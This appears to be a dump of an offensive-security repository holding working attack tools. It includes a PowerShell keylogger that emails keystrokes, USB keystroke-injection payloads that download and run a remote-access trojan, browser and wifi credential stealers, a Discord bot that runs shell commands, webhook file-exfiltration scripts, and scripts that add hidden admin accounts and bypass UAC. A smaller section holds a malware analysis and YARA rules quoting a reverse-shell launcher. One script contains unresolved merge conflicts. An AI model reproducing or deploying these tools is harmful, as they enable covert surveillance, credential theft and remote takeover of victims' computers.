| 22 | # API signatures 23 | $APIsignatures = @' 24 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 25 | public static extern short GetAsyncKeyState(int virtualKeyCode); 26 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 27 | public static extern int GetKeyboardState(byte[] keystate); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int 
MapVirtualKey(uint uCode, int uMapType); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 32 | '@ 33 | 34 | # set up API 35 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 36 | 37 | # attempt to log keystrokes 38 | try { 39 | while ($true) { 40 | Start-Sleep -Milliseconds 40 41 | 42 | for ($ascii = 9; $ascii -le 254; $ascii++) { 43 | 44 | # use API to get key state 45 | $keystate = $API::GetAsyncKeyState($ascii) 46 | 47 | # use API to detect keystroke 48 | if ($keystate -eq -32767) { 49 | $null = [console]::CapsLock 50 | 51 | # map virtual key 52 | $mapKey = $API::MapVirtualKey($ascii, 3) 53 | 54 | # create a stringbuilder 55 | $keyboardState = New-Object Byte[] 256 56 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 57 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 58 | 59 | # translate virtual key 60 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 61 | # add logged key to file 62 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 63 | } 64 | } 65 | } 66 | } 67 | } 68 | 69 | # send logs if code fails 70 | finally { 71 | # send email 72 | $smtp.Send($email, $email, $subject, $logs); 73 | } 74 | } 75 | 76 | # run keylogger 77 | KeyLogger -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Bash Bunny Keylogger 2 | # Description: A keylogger for the bash bunny 3 | # Author: Blue Cosmo 4 | # Category: General 5 | # Target: Windows 10 6 | # Attackmodes: HID, STORAGE 7 | 8 | # set up payload 9 | LED SETUP 10 | GET SWITCH_POSITION 11 | ATTACKMODE HID STORAGE 12 | 13 | # open powershell 14 | LED STAGE1 15 | 
RUN WIN powershell 16 | 17 | # run duckyscript file 'duckyscript.txt' 18 | LED STAGE2 19 | QUACK ${SWITCH_POSITION}/duckyscript.txt 20 | 21 | # end payload 22 | LED FINISH -------------------------------------------------------------------------------- /bashbunny/OnlyBUGS/README.md: -------------------------------------------------------------------------------- 1 | ## OnlyBUGS 2 | This is an installer for OnlyRAT that uses the [Bash Bunny](https://shop.hak5.org/products/bash-bunny). 3 | 4 | ## Download: 5 | ```bash 6 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/OnlyBUGS 7 | ``` 8 | 9 | ## Instructions: 10 | 1. in line 18 of `duckyscript.txt`, replace `DISCORDWEBHOOK` with your discord webhook 11 | ``` 12 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 13 | ``` 14 | 2. add `payload.txt` and `duckyscript.txt` to a switch position on your BashBunny 15 | 3. deploy! 16 | -------------------------------------------------------------------------------- /bashbunny/OnlyBUGS/duckyscript.txt: -------------------------------------------------------------------------------- 1 | REM OnlyRAT installer via the USB Rubber Ducky 2 | REM Created by : C0SM0 3 | 4 | REM open the command line via the runbox 5 | DELAY 1000 6 | GUI r 7 | DELAY 400 8 | STRING cmd 9 | ENTER 10 | 11 | REM execute discord webhook installer 12 | DELAY 800 13 | STRING set "YKHfpmMRoQ=C:/Users/%username%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup" 14 | ENTER 15 | STRING cd %YKHfpmMRoQ% 16 | ENTER 17 | REM replace "DISCORDWEBHOOK" with your Discord Webhook 18 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 19 | ENTER 20 | STRING powershell powershell.exe -windowstyle hidden "Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/dw1.cmd -OutFile wEaoFkNduy.cmd" 21 | ENTER 22 | DELAY 200 23 | STRING powershell ./wEaoFkNduy.cmd && exit 24 | ENTER 25 | 26 | REM UAC bypass 27 | DELAY 1800 28 | ALT y 
-------------------------------------------------------------------------------- /bashbunny/OnlyBUGS/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: OnlyBunny 2 | # Description: Installs OnlyRAT on computers 3 | # Author: Blue Cosmo 4 | # Category: remote access 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # setup payload 9 | LED SETUP 10 | ATTACKMODE HID 11 | GET SWITCH_POSITION 12 | 13 | # execute duckyscript 14 | LED STAGE1 15 | QUACK ${SWITCH_POSITION}/duckyscript.txt 16 | 17 | LED FINISH 18 | -------------------------------------------------------------------------------- /bashbunny/geofencing/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Bash Bunny Geofencing 2 | # Description: a POC for geofencing 3 | # Author: Blue Cosmo 4 | # Category: POC 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # website opener payload 9 | 10 | # configure bash bunny 11 | LED SETUP 12 | ATTACKMODE HID 13 | 14 | # replace "device" with your bluetooth device 15 | WAIT_FOR_PRESENT device 16 | 17 | # opens website [ccs] 18 | LED STAGE1 19 | RUN WIN www.cosmodiumcs.com 20 | 21 | LED FINISH 22 | -------------------------------------------------------------------------------- /bashbunny/helloworld/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Hello, World! 2 | # Description: opens notepad, types "Hello, World!" 3 | # Author: Blue Cosmo [Chris Taylor] 4 | # Category: poc 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # configures bunny 9 | LED SETUP 10 | ATTACKMODE HID 11 | 12 | # opens notepad 13 | LED STAGE1 14 | RUN WIN Notepad.exe 15 | 16 | # write content to notepad 17 | LED STAGE2 18 | QUACK DELAY 400 19 | QUACK STRING Hello, World! 
20 | 21 | LED FINISH 22 | -------------------------------------------------------------------------------- /bashbunny/remote-trigger/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: BashBunny Remote Triggers 2 | # Description: a POC for remote triggering 3 | # Author: Blue Cosmo 4 | # Category: POC 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # hello world payload 9 | 10 | # configure bash bunny 11 | LED SETUP 12 | ATTACKMODE HID 13 | 14 | # replace "device" with your bluetooth device 15 | WAIT_FOR_PRESENT device 16 | # WAIT_FOR_NOT_PRESENT is also an option 17 | 18 | # open notepad 19 | LED STAGE1 20 | RUN WIN notepad.exe 21 | 22 | # write "hello, world" to notepad 23 | LED STAGE2 24 | QUACK DELAY 400 25 | QUACK STRING Hello, World! 26 | 27 | LED FINISH 28 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/P.cfg: -------------------------------------------------------------------------------- 1 | [General] 2 | ShowGridLines=0 3 | SaveFilterIndex=1 4 | ShowInfoTip=1 5 | MarkOddEvenRows=0 6 | ShowTimeInGMT=0 7 | LoadPasswordsIE=1 8 | LoadPasswordsFirefox=1 9 | LoadPasswordsChrome=1 10 | LoadPasswordsOpera=1 11 | LoadPasswordsSafari=1 12 | LoadPasswordsSeaMonkey=1 13 | LoadPasswordsYandex=1 14 | LoadPasswordsVivaldi=1 15 | LoadPasswordsWaterfox=1 16 | LoadPasswordsBrave=1 17 | UseFirefoxProfileFolder=0 18 | UseFirefoxInstallFolder=0 19 | UseChromeProfileFolder=0 20 | UseOperaPasswordFile=0 21 | FirefoxProfileFolder= 22 | FirefoxInstallFolder= 23 | ChromeProfileFolder= 24 | OperaPasswordFile= 25 | SaveFileEncoding=0 26 | UseQuickFilter=0 27 | QuickFilterString= 28 | QuickFilterColumnsMode=1 29 | QuickFilterFindMode=1 30 | WinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00 31 | Columns=FA 00 00 00 78 00 01 00 96 00 02 00 96 00 03 00 64 00 04 00 78 00 05 
00 78 00 06 00 78 00 07 00 78 00 08 00 C8 00 09 00 32 | Sort=0 33 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/P.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/bashbunny/webcredential-gui/P.exe -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/README.md: -------------------------------------------------------------------------------- 1 | # Web Credential Stealer 2 | > Blue Cosmo 3 | 4 | # Requirements 5 | bashbunny, twinduck labled "P", or usb drive labled "P" 6 | 7 | ## Overview 8 | steals web credentials from windows 10 computer 9 | 10 | ## Download: 11 | ```bash 12 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/webcredential-gui 13 | ``` 14 | 15 | ## Setup 16 | you must run the "P.exe" file in your microSD card before using this payload 17 | - a "P.cfg" file should appear 18 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/WebBrowserPassView.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/bashbunny/webcredential-gui/WebBrowserPassView.chm -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/ducky-script.txt: -------------------------------------------------------------------------------- 1 | REM Exfiltrate Web passwords to usb, bashbunny, or twinduck 2 | REM Created By : Blue Cosmo 3 | 4 | REM let computer recognize twinduck 5 | DELAY 1000 6 | 7 | REM open powershell via runbox 8 | GUI r 9 | DELAY 200 10 | STRING powershell 11 | ENTER 12 | DELAY 300 13 | 14 | REM cd into drive labeled "BASHBUNNY", add path to clipboard 15 | 
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BASHBUNNY'}|select name;cd $u.name 16 | ENTER 17 | DELAY 200 18 | STRING mkdir loot\$env:UserName 19 | ENTER 20 | DELAY 200 21 | STRING cd .\payloads\switch1\ 22 | ENTER 23 | DELAY 200 24 | STRING $u.name+"loot\"+$env:UserName | clip 25 | ENTER 26 | 27 | REM run "P.exe" and save creds to drive 28 | DELAY 100 29 | STRING ./P.exe; exit 30 | ENTER 31 | DELAY 3000 32 | CTRL a 33 | CTRL s 34 | DELAY 200 35 | STRING pw.txt 36 | ALT d 37 | CTRL v 38 | ENTER 39 | ALT s 40 | DELAY 100 41 | ALT F4 42 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/payload.txt: -------------------------------------------------------------------------------- 1 | LED SETUP 2 | 3 | GET SWITCH_POSITION 4 | 5 | ATTACKMODE HID STORAGE 6 | 7 | 8 | if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky-script.txt" ]; then 9 | 10 | 11 | #Call ducky script 12 | LED STAGE1 13 | 14 | 15 | QUACK ${SWITCH_POSITION}/ducky-script.txt 16 | 17 | QUACK DELAY 10000 18 | 19 | LED FINISH 20 | 21 | else 22 | 23 | LED FAIL 24 | 25 | #Red LED if unable to load script 26 | echo "Unable to load ducky-script.txt" >> /root/debuglog.txt 27 | 28 | exit 1 29 | 30 | fi -------------------------------------------------------------------------------- /bashbunny/wifi-credentials/README.md: -------------------------------------------------------------------------------- 1 | steals wifi credentials 2 | 3 | ## install 4 | ```bash 5 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/wifi-credentials 6 | ``` 7 | -------------------------------------------------------------------------------- /bashbunny/wifi-credentials/ducky-script.txt: -------------------------------------------------------------------------------- 1 | REM bashbunny wifi password stealer 2 | REM created by : blue cosmo 3 | 4 | REM open powershell 5 | GUI r 6 | DELAY 200 7 | STRING powershell 8 | ENTER 9 | DELAY 300 10 | 11 | REM cd into 
bashbunny labeled 'BashBunny'
subprocess.check_output(cmd, shell=True, universal_newlines=True) 22 | await message.channel.send(cmd_output[:2000]) 23 | return 24 | 25 | @client.event 26 | async def on_message(message): 27 | msg = str(message.content) 28 | 29 | if msg.startswith('$'): 30 | cmd = msg[1:].strip() 31 | await execute(message, cmd) 32 | 33 | client.run(TOKEN) 34 | -------------------------------------------------------------------------------- /discord/exfiltration-screen.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/discord/exfiltration-screen.ps1 -------------------------------------------------------------------------------- /discord/exfiltration-wifi.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/discord/exfiltration-wifi.ps1 -------------------------------------------------------------------------------- /discord/get-webhook.cmd: -------------------------------------------------------------------------------- 1 | REM get info from webhook 2 | REM created by : cosmo 3 | 4 | @echo off 5 | set "webhook=WEBHOOK" 6 | curl.exe -G %webhook% 7 | -------------------------------------------------------------------------------- /discord/get-webhook.ps1: -------------------------------------------------------------------------------- 1 | # get info from webhook 2 | # created by : cosmo 3 | 4 | $webhook = "WEBHOOK" 5 | curl.exe -G $webhook 6 | 7 | -------------------------------------------------------------------------------- /discord/get-webhook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # get info from webhook 3 | # created by : cosmo 4 | 5 | curl -G WEBHOOK 6 | -------------------------------------------------------------------------------- 
/discord/send-file.cmd: -------------------------------------------------------------------------------- 1 | REM send file to webhook 2 | REM created by : cosmo 3 | 4 | curl.exe -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" -F "file=@file.txt" WEBHOOK 5 | -------------------------------------------------------------------------------- /discord/send-file.ps1: -------------------------------------------------------------------------------- 1 | # send file to webhook 2 | # created by : cosmo 3 | 4 | curl.exe -F "payload_json={\`"username\`": \`"cosmo\`", \`"content\`": \`"download me\`"}" WEBHOOK 5 | 6 | -------------------------------------------------------------------------------- /discord/send-file.sh: -------------------------------------------------------------------------------- 1 | # send file to webhook 2 | # created by : cosmo 3 | 4 | curl -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" WEBHOOK 5 | -------------------------------------------------------------------------------- /discord/send-message.cmd: -------------------------------------------------------------------------------- 1 | curl.exe -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" WEBHOOK 2 | -------------------------------------------------------------------------------- /discord/send-message.ps1: -------------------------------------------------------------------------------- 1 | # send message to webhook 2 | # created by : cosmo 3 | 4 | curl.exe -F "payload_json={\`"username\`": \`"cosmo\`", \`"content\`": \`"download me\`"}" WEBHOOK 5 | -------------------------------------------------------------------------------- /discord/send-message.sh: -------------------------------------------------------------------------------- 1 | # send message to webhook 2 | # created by : cosmo 3 | 4 | curl -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" WEBHOOK 5 | 
-------------------------------------------------------------------------------- /privesc/create-admin.ps1: -------------------------------------------------------------------------------- 1 | <<<<<<< HEAD 2 | function geIwCZloBx { 3 | [CmdletBinding()] 4 | param ( 5 | [string] $sqbXFdLvyw, 6 | [securestring] $CBFXIYeWPR 7 | ======= 8 | function create_admin { 9 | [CmdletBinding()] 10 | param ( 11 | [string] $admin_username, 12 | [securestring] $admin_password_secure 13 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 14 | ) 15 | begin { 16 | } 17 | process { 18 | <<<<<<< HEAD 19 | New-LocalUser "$sqbXFdLvyw" -Password $CBFXIYeWPR -FullName "$sqbXFdLvyw" -Description "Temporary local admin" 20 | Write-Verbose "$sqbXFdLvyw local user crated" 21 | Add-LocalGroupMember -Group "Administrators" -Member "$sqbXFdLvyw" 22 | Write-Verbose "$sqbXFdLvyw added to the local administrator group" 23 | ======= 24 | New-LocalUser "$admin_username" -Password $admin_password_secure -FullName "$admin_username" -Description "Temporary local admin" 25 | Write-Verbose "$admin_username local user crated" 26 | Add-LocalGroupMember -Group "Administrators" -Member "$admin_username" 27 | Write-Verbose "$admin_username added to the local administrator group" 28 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 29 | } 30 | end { 31 | } 32 | } 33 | 34 | <<<<<<< HEAD 35 | Remove-LocalUser -Name "onlyrat" 36 | $sqbXFdLvyw = "onlyrat" 37 | $DCilJFugpP = RpLGWiUsIy 38 | $CBFXIYeWPR = (ConvertTo-SecureString $DCilJFugpP -AsPlainText -Force) 39 | geIwCZloBx -sqbXFdLvyw $sqbXFdLvyw -CBFXIYeWPR $CBFXIYeWPR 40 | ======= 41 | Remove-LocalUser -Name "admin-user" 42 | $admin_username = "admin-user" 43 | $admin_password = "password" 44 | $admin_password_secure = (ConvertTo-SecureString $admin_password -AsPlainText -Force) 45 | create_admin -admin_username $admin_username -CBFXIYeWPR $admin_password_secure 46 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 47 | 
-------------------------------------------------------------------------------- /privesc/getadmin.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | @REM will start as admin 32 | start -------------------------------------------------------------------------------- /privesc/uac-prompt.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 
15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | @REM will start as admin 32 | start -------------------------------------------------------------------------------- /reports/README.md: -------------------------------------------------------------------------------- 1 | zip archive password : `infected` 2 | -------------------------------------------------------------------------------- /reports/sillyputty/README.md: -------------------------------------------------------------------------------- 1 | - [live analysis](https://www.youtube.com/live/NrPUtV_53hQ?feature=share) 2 | - [live reporting](https://www.youtube.com/live/9OpIt_fi8mc?feature=share) 3 | -------------------------------------------------------------------------------- /reports/sillyputty/SillyPutty-MalwareAnalysisReport.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/reports/sillyputty/SillyPutty-MalwareAnalysisReport.pdf -------------------------------------------------------------------------------- /reports/sillyputty/putty.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/reports/sillyputty/putty.7z -------------------------------------------------------------------------------- /reports/sillyputty/sillyputty.yara: -------------------------------------------------------------------------------- 1 | rule putty_exe { 2 | 3 | meta: 4 | last_updated = "2023-05-06" 5 | 
author = "C0SM0" 6 | description = "YARA rules for SillyPutty (putty.exe)" 7 | 8 | strings: 9 | 10 | // putty.exe 11 | $magic_bytes = "MZ" 12 | $powershell_execution = "powershell.exe -nop -w hidden -noni -ep bypass \"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('" 13 | $base64_payload = "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" 14 | 15 | condition: 16 | (($magic_bytes at 0) and $base64_payload) 17 | or 18 | ($magic_bytes at 0) and $powershell_execution 19 | 20 | 21 | } 22 | 23 | // powerfun.ps1 24 | rule powerfun_ps1 { 25 | 26 | meta: 27 | last_updated = "2023-05-06" 28 | author = "C0SM0" 29 | description = "YARA rules for SillyPutty (powerfun.ps1)" 30 | 31 | strings: 32 | $domain = "bonus2.corporatebonusapplication.local" 33 | $port = "8443" 34 | $authors = "# Powerfun - Written by Ben Turner & Dave Hardy" 35 | $execution = "powerfun -Command reverse -Sslcon true" 36 | $tcp_listener = "[System.Net.Sockets.TcpListener]" 37 | $tcp_client = "System.Net.Sockets.TCPClient" 38 | 39 | condition: 40 | ($domain and $port) 41 | or 42 | ($tcp_listener and $tcp_client) 43 | or 44 | $execution 45 | or 46 | $authors 47 | 48 | } -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 
11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. 
-------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/README.md: -------------------------------------------------------------------------------- 1 | # DucKey Logger V.2 2 | > Chris Taylor [Blue Cosmo] | 08/24/21 3 | --- 4 | 5 | ``` 6 | ::::::::: ::: ::: :::::::: ::: ::: :::::::::: ::: ::: 7 | :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: 8 | +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ 9 | +#+ +:+ +#+ +:+ +#+ +#++:++ +#++:++# +#++: 10 | +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ 11 | #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# 12 | ######### ######## ######## ### ### ########## ### 13 | ``` 14 | 15 | ## Update: 16 | logs can now be sent every hour 17 | 18 | ## Overview: 19 | ``` 20 | DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes 21 | ``` 22 | - moves *c.cmd* file to windows startup directory 23 | - *c.cmd* will secretly run *p.ps1* 24 | - *p.ps1* will log keystrokes 25 | - *l.ps1* will email the logs every startup and every hour [via SMTP] 26 | - sends logs hourly, regardless of system time 27 | 28 | ## Resources: 29 | - [YouTube Video](https://www.youtube.com/watch?v=uHIZZYFeVJA) 30 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 31 | - [Website](https://cosmodiumcs.com) 32 | 33 | ## Requirements: 34 | - Twin-Duck firmware 35 | - Gmail account 36 | - i suggest making a separate Gmail account for this payload 37 | - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 38 | - Windows 10 Target 39 | 40 | ## Download: 41 | ```bash 42 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/DucKey-Logger 43 | ``` 44 | 45 | ## Instructions: 46 | Set-Up/Installation 47 | 1. change Gmail credentials in *p.ps1* 48 | ```powershell 49 | # gmail credentials 50 | $email = "example@gmail.com" 51 | $password = "password" 52 | ``` 53 | 2. 
in line 20 of *payload.txt*, change 'L' to the volume label of your ducky [SD Card] (the snippet below is from an older version; the shipped line also copies `l.ps1` to `$env:temp`)
24 | '18:00:00', 25 | '19:00:00', 26 | '20:00:00', 27 | '21:00:00', 28 | '22:00:00', 29 | '23:00:00' 30 | ) 31 | 32 | # sort the times in chronological order 33 | $logTimes = $logTimes | Sort-Object 34 | 35 | # ensure keylogger runs every day 36 | while ($true) { 37 | 38 | # run keylogger for each trigger time 39 | foreach ($t in $logTimes) 40 | { 41 | # checks if time passed already 42 | if((Get-Date) -lt (Get-Date -Date $t)) 43 | { 44 | # sleeps until next time is reached 45 | while ((Get-Date -Date $t) -gt (Get-Date)) 46 | { 47 | # sleeps 48 | (Get-Date -Date $t) - (Get-Date) | Start-Sleep 49 | } 50 | 51 | # runs keylogger 52 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # keylogger 9 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 10 | 11 | # email process 12 | $logs = Get-Content "$logFile" 13 | $subject = "$env:UserName logs" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $logs); 18 | 19 | # generate log file 20 | $generateLog = New-Item -Path $logFile -ItemType File -Force 21 | 22 | # API signatures 23 | $APIsignatures = @' 24 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 25 | public static extern short GetAsyncKeyState(int virtualKeyCode); 26 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 27 | public static extern int GetKeyboardState(byte[] keystate); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int 
MapVirtualKey(uint uCode, int uMapType); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 32 | '@ 33 | 34 | # set up API 35 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 36 | 37 | # attempt to log keystrokes 38 | try { 39 | while ($true) { 40 | Start-Sleep -Milliseconds 40 41 | 42 | for ($ascii = 9; $ascii -le 254; $ascii++) { 43 | 44 | # use API to get key state 45 | $keystate = $API::GetAsyncKeyState($ascii) 46 | 47 | # use API to detect keystroke 48 | if ($keystate -eq -32767) { 49 | $null = [console]::CapsLock 50 | 51 | # map virtual key 52 | $mapKey = $API::MapVirtualKey($ascii, 3) 53 | 54 | # create a stringbuilder 55 | $keyboardState = New-Object Byte[] 256 56 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 57 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 58 | 59 | # translate virtual key 60 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 61 | # add logged key to file 62 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 63 | } 64 | } 65 | } 66 | } 67 | } 68 | 69 | # send logs if code fails 70 | finally { 71 | # send email 72 | $smtp.Send($email, $email, $subject, $logs); 73 | } 74 | } 75 | 76 | # run keylogger 77 | KeyLogger -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/payload.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 